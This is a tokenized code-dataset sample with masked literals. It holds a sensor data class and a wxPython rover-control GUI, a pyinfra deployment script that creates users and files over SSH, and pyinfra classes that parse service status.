<s> class POCVModelData : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . has_GPS = False <EOL> self . fix = <NUM_LIT:0> <EOL> self . lat = <NUM_LIT:0.0> <EOL> self . lon = <NUM_LIT:0.0> <EOL> self . gps_heading = <NUM_LIT:0.0> <EOL> self . speed = <NUM_LIT:0.0> <EOL> self . altitude = <NUM_LIT:0.0> <EOL> self . num_sat = <NUM_LIT:0> <EOL> self . has_time = False <EOL> self . timestamp = '<STR_LIT>' <EOL> self . datestamp = '<STR_LIT>' <EOL> self . has_compass = False <EOL> self . compass_heading = <NUM_LIT:0.0> <EOL> self . compass_pitch = <NUM_LIT:0.0> <EOL> self . compass_roll = <NUM_LIT:0.0> <EOL> self . has_magnetometer = False <EOL> self . magnet_x = <NUM_LIT:0.0> <EOL> self . magnet_y = <NUM_LIT:0.0> <EOL> self . magnet_z = <NUM_LIT:0.0> <EOL> self . has_gyro = False <EOL> self . has_accelerometer = False <EOL> self . accelerometer_x = <NUM_LIT:0.0> <EOL> self . accelerometer_y = <NUM_LIT:0.0> <EOL> self . accelerometer_z = <NUM_LIT:0.0> <EOL> self . has_temperature = False <EOL> self . temperature = <NUM_LIT:0.0> </s>
<s> import logging <EOL> import socket <EOL> import datetime <EOL> import wx <EOL> from camera_view import CameraPanel <EOL> class MainWindow ( wx . Frame ) : <EOL> def __init__ ( self , parent , title , controller , server_name , rpc_port , camera_port ) : <EOL> self . controller = controller <EOL> self . _server_name = server_name <EOL> self . _rpc_port = rpc_port <EOL> self . _camera_port = camera_port <EOL> wx . Frame . __init__ ( self , parent , title = title , size = ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . panel = wx . Panel ( self ) <EOL> self . sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> self . sizer_view = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> self . sizer_control = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> self . sizer . Add ( self . sizer_view , <NUM_LIT:1> , wx . EXPAND | wx . LEFT | wx . RIGHT | wx . TOP , <NUM_LIT:4> ) <EOL> self . sizer . Add ( self . sizer_control , <NUM_LIT:1> , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . map_frame = MapPanel ( self . panel , controller ) <EOL> self . sizer_view . Add ( self . map_frame , <NUM_LIT:3> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> cam_enabled = self . controller . model . capture_img_enabled <EOL> self . camera_frame = CameraPanel ( self . panel , server_name , camera_port , cam_enabled ) <EOL> self . sizer_view . Add ( self . camera_frame , <NUM_LIT:1> , wx . EXPAND ) <EOL> self . camera_update_count = <NUM_LIT:0> <EOL> self . waypoint_frame = WayPointPanel ( self . panel ) <EOL> self . sizer_control . Add ( self . waypoint_frame , <NUM_LIT:1> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> self . display_frame = DisplayPanel ( self . panel , controller ) <EOL> self . sizer_control . Add ( self . display_frame , <NUM_LIT:1> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> self . autopilot_frame = AutoPilotPanel ( self . panel , controller ) <EOL> self . sizer_control . Add ( self . autopilot_frame , <NUM_LIT:1> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> self . manualpilot_frame = ManualPilotPanel ( self . panel , controller ) <EOL> self . sizer_control . Add ( self . manualpilot_frame , <NUM_LIT:1> , wx . EXPAND ) <EOL> self . CreateStatusBar ( ) <EOL> self . panel . SetSizerAndFit ( self . sizer ) <EOL> self . Bind ( wx . EVT_CLOSE , self . OnClose ) <EOL> interval_time = <NUM_LIT> <EOL> self . timer = wx . Timer ( self ) <EOL> self . Bind ( wx . EVT_TIMER , self . on_timer , self . timer ) <EOL> self . timer . Start ( interval_time , False ) <EOL> def on_timer ( self , event ) : <EOL> self . update ( ) <EOL> def OnClose ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> if self . controller : <EOL> self . controller . close_connection ( ) <EOL> def update ( self ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( "<STR_LIT>" ) <EOL> self . controller . update ( ) <EOL> self . display_frame . update ( ) <EOL> if self . camera_update_count > <NUM_LIT:200> : <EOL> self . camera_frame . update ( ) <EOL> self . camera_update_count = <NUM_LIT:0> <EOL> else : <EOL> self . camera_update_count += <NUM_LIT:1> <EOL> @ property <EOL> def server ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _server <EOL> @ property <EOL> def rpc_port ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _rpc_port <EOL> @ property <EOL> def camera_port ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _camera_port <EOL> class MapPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , view_controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . _view_controller = view_controller <EOL> class WayPointPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:2> , hgap = <NUM_LIT:2> ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> class DisplayPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . controller = controller <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:2> , hgap = <NUM_LIT:2> ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . l1 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l1 , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l2 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l2 , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t2 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t2 , ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l3 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l3 , ( <NUM_LIT:4> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t3 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t3 , ( <NUM_LIT:4> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l4 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l4 , ( <NUM_LIT:5> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t4 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t4 , ( <NUM_LIT:5> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l5 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l5 , ( <NUM_LIT:6> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t5 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t5 , ( <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l6 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l6 , ( <NUM_LIT:7> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t6 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t6 , ( <NUM_LIT:7> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l7 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l7 , ( <NUM_LIT:8> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t7 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t7 , ( <NUM_LIT:8> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . cb_fix = wx . CheckBox ( self , label = "<STR_LIT>" ) <EOL> self . cb_fix . SetValue ( False ) <EOL> self . sizer . Add ( self . cb_fix , ( <NUM_LIT:9> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l8 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l8 , ( <NUM_LIT:10> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t8 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t8 , ( <NUM_LIT:10> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:11> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . l9 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l9 , ( <NUM_LIT:12> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . l10 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l10 , ( <NUM_LIT> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t10 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t10 , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l11 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l11 , ( <NUM_LIT> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t11 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t11 , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l12 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l12 , ( <NUM_LIT:15> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t12 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t12 , ( <NUM_LIT:15> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . sizer . AddGrowableCol ( <NUM_LIT:0> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> def update ( self ) : <EOL> self . t2 . SetValue ( str ( self . controller . model . GPS_latitude ) ) <EOL> self . t3 . SetValue ( str ( self . controller . model . GPS_longitude ) ) <EOL> self . t5 . SetValue ( str ( self . controller . model . GPS_heading ) ) <EOL> self . t6 . SetValue ( str ( self . controller . model . GPS_speed ) ) <EOL> self . t7 . SetValue ( str ( self . controller . model . GPS_altitude ) ) <EOL> self . cb_fix . SetValue ( self . controller . model . GPS_fix ) <EOL> self . t8 . SetValue ( str ( self . controller . model . GPS_satellite_count ) ) <EOL> self . t4 . SetValue ( str ( self . controller . model . compass_heading ) ) <EOL> self . t10 . SetValue ( str ( self . controller . model . time ) ) <EOL> self . t11 . SetValue ( str ( self . controller . model . date ) ) <EOL> self . t12 . SetValue ( str ( self . controller . model . temperature ) ) <EOL> class AutoPilotPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . controller = controller <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:4> , hgap = <NUM_LIT:4> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . lblHeading = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblHeading , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . CENTER | wx . ALIGN_CENTER_HORIZONTAL | wx . ALL , <NUM_LIT:2> ) <EOL> self . heading = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT> , maxValue = <NUM_LIT> , style = wx . SL_HORIZONTAL ) <EOL> self . heading . Bind ( wx . EVT_SCROLL , self . on_heading_scroll ) <EOL> self . sizer . Add ( self . heading , ( <NUM_LIT:4> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnCentreRudder = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnCentreRudder . Bind ( wx . EVT_BUTTON , self . zero_heading ) <EOL> self . sizer . Add ( self . btnCentreRudder , ( <NUM_LIT:5> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . lblThrottle = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblThrottle , ( <NUM_LIT:7> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . CENTER | wx . ALIGN_CENTER_VERTICAL | wx . ALIGN_RIGHT | wx . ALL , <NUM_LIT:2> ) <EOL> self . speed = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT:100> , maxValue = <NUM_LIT:100> , style = wx . SL_VERTICAL ) <EOL> self . speed . Bind ( wx . EVT_SCROLL , self . on_speed_scroll ) <EOL> self . sizer . Add ( self . speed , ( <NUM_LIT:7> , <NUM_LIT:1> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnZeroThrottle = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnZeroThrottle . Bind ( wx . EVT_BUTTON , self . zero_speed ) <EOL> self . sizer . Add ( self . btnZeroThrottle , ( <NUM_LIT:7> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnAuto = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnAuto . Bind ( wx . EVT_BUTTON , self . engage ) <EOL> self . sizer . Add ( self . btnAuto , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . btnHalt = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnHalt . Bind ( wx . EVT_BUTTON , self . halt ) <EOL> self . sizer . Add ( self . btnHalt , ( <NUM_LIT:10> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> def engage ( self , event ) : <EOL> self . controller . set_auto_pilot_mode ( ) <EOL> self . send_update ( ) <EOL> def halt ( self , event ) : <EOL> self . speed . SetValue ( <NUM_LIT:0.0> ) <EOL> self . heading . SetValue ( <NUM_LIT:0.0> ) <EOL> self . lblThrottle . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . lblHeading . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . controller . halt ( ) <EOL> def zero_speed ( self , event ) : <EOL> self . speed . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def zero_heading ( self , event ) : <EOL> self . heading . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def on_speed_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def on_heading_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def send_update ( self ) : <EOL> sp = self . speed . GetValue ( ) * - <NUM_LIT:1.0> <EOL> he = self . heading . GetValue ( ) <EOL> self . lblThrottle . SetLabel ( str ( sp ) ) <EOL> self . lblHeading . SetLabel ( str ( he ) ) <EOL> self . controller . set_navigation ( sp , he ) <EOL> class ManualPilotPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . controller = controller <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:4> , hgap = <NUM_LIT:4> ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . lblHeading = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblHeading , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . CENTER | wx . ALIGN_CENTER_HORIZONTAL | wx . ALL , <NUM_LIT:2> ) <EOL> self . steering = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT> , maxValue = <NUM_LIT> , style = wx . SL_HORIZONTAL ) <EOL> self . steering . Bind ( wx . EVT_SCROLL , self . on_steering_scroll ) <EOL> self . sizer . Add ( self . steering , ( <NUM_LIT:4> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnCentreRudder = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnCentreRudder . Bind ( wx . EVT_BUTTON , self . centre_rudder ) <EOL> self . sizer . Add ( self . btnCentreRudder , ( <NUM_LIT:5> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . lblThrottle = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblThrottle , ( <NUM_LIT:7> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . CENTER | wx . ALIGN_CENTER_VERTICAL | wx . ALIGN_RIGHT | wx . ALL , <NUM_LIT:2> ) <EOL> self . throttle = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT:100> , maxValue = <NUM_LIT:100> , style = wx . SL_VERTICAL ) <EOL> self . throttle . Bind ( wx . EVT_SCROLL , self . on_throttle_scroll ) <EOL> self . sizer . Add ( self . throttle , ( <NUM_LIT:7> , <NUM_LIT:1> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnZeroThrottle = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnZeroThrottle . Bind ( wx . EVT_BUTTON , self . zero_throttle ) <EOL> self . sizer . Add ( self . btnZeroThrottle , ( <NUM_LIT:7> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnManual = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnManual . Bind ( wx . EVT_BUTTON , self . engage ) <EOL> self . sizer . Add ( self . btnManual , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . btnHalt = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnHalt . Bind ( wx . EVT_BUTTON , self . halt ) <EOL> self . sizer . Add ( self . btnHalt , ( <NUM_LIT:10> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> def engage ( self , event ) : <EOL> self . controller . set_manual_mode ( ) <EOL> self . send_update ( ) <EOL> def halt ( self , event ) : <EOL> self . throttle . SetValue ( <NUM_LIT:0.0> ) <EOL> self . steering . SetValue ( <NUM_LIT:0.0> ) <EOL> self . lblThrottle . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . lblHeading . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . controller . halt ( ) <EOL> def zero_throttle ( self , event ) : <EOL> self . throttle . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def centre_rudder ( self , event ) : <EOL> self . steering . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def on_throttle_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def on_steering_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def send_update ( self ) : <EOL> th = self . throttle . GetValue ( ) * - <NUM_LIT:1.0> <EOL> st = self . steering . GetValue ( ) <EOL> self . lblThrottle . SetLabel ( str ( th ) ) <EOL> self . lblHeading . SetLabel ( str ( st ) ) <EOL> self . controller . set_drive ( th , st ) </s>
<s> from gevent import monkey <EOL> monkey . patch_all ( ) <EOL> import json <EOL> import logging <EOL> from pyinfra . api import Inventory , Config , State <EOL> from pyinfra . api . operation import add_op <EOL> from pyinfra . api . operations import run_ops <EOL> from pyinfra . api . ssh import connect_all <EOL> from pyinfra . api . facts import get_facts <EOL> from pyinfra . modules import server , files <EOL> logging . basicConfig ( level = logging . WARNING ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . INFO ) <EOL> inventory = Inventory ( <EOL> ( [ <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , { } ) , <EOL> bsd = ( [ <EOL> '<STR_LIT>' <EOL> ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) , <EOL> centos = ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , { } ) , <EOL> ssh_user = '<STR_LIT>' , <EOL> ssh_key = '<STR_LIT>' <EOL> ) <EOL> config = Config ( <EOL> FAIL_PERCENT = <NUM_LIT:50> , <EOL> TIMEOUT = <NUM_LIT:1> <EOL> ) <EOL> state = State ( inventory , config ) <EOL> connect_all ( state ) <EOL> add_op ( <EOL> state , server . user , <EOL> '<STR_LIT>' , <EOL> home = '<STR_LIT>' , <EOL> shell = '<STR_LIT>' , <EOL> sudo = True <EOL> ) <EOL> add_op ( <EOL> state , files . file , <EOL> '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> group = '<STR_LIT>' , <EOL> mode = '<STR_LIT>' , <EOL> sudo = True <EOL> ) <EOL> add_op ( <EOL> state , files . directory , <EOL> '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> group = '<STR_LIT>' , <EOL> mode = '<STR_LIT>' , <EOL> sudo = True <EOL> ) <EOL> add_op ( <EOL> state , files . put , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> run_ops ( state ) <EOL> facts = get_facts ( state , '<STR_LIT>' ) <EOL> print ( json . dumps ( facts , indent = <NUM_LIT:4> ) ) </s>
<s> import re <EOL> from pyinfra . api import FactBase <EOL> class UpstartStatus ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = matches . group ( <NUM_LIT:2> ) == '<STR_LIT>' <EOL> return services <EOL> class SystemdStatus ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = matches . group ( <NUM_LIT:2> ) == '<STR_LIT>' <EOL> return services <EOL> class SystemdEnabled ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = matches . group ( <NUM_LIT:2> ) in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return services <EOL> class InitdStatus ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '''<STR_LIT>''' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> status = int ( matches . group ( <NUM_LIT:2> ) ) <EOL> if status == <NUM_LIT:0> : <EOL> status = True <EOL> elif status < <NUM_LIT:4> : <EOL> status = False <EOL> else : <EOL> status = None <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = status <EOL> return services <EOL> class RcdStatus ( InitdStatus ) : <EOL> '''<STR_LIT>''' <EOL> command = '''<STR_LIT>''' <EOL> class RcdEnabled ( FactBase ) : <EOL> '''<STR_LIT>''' </s>
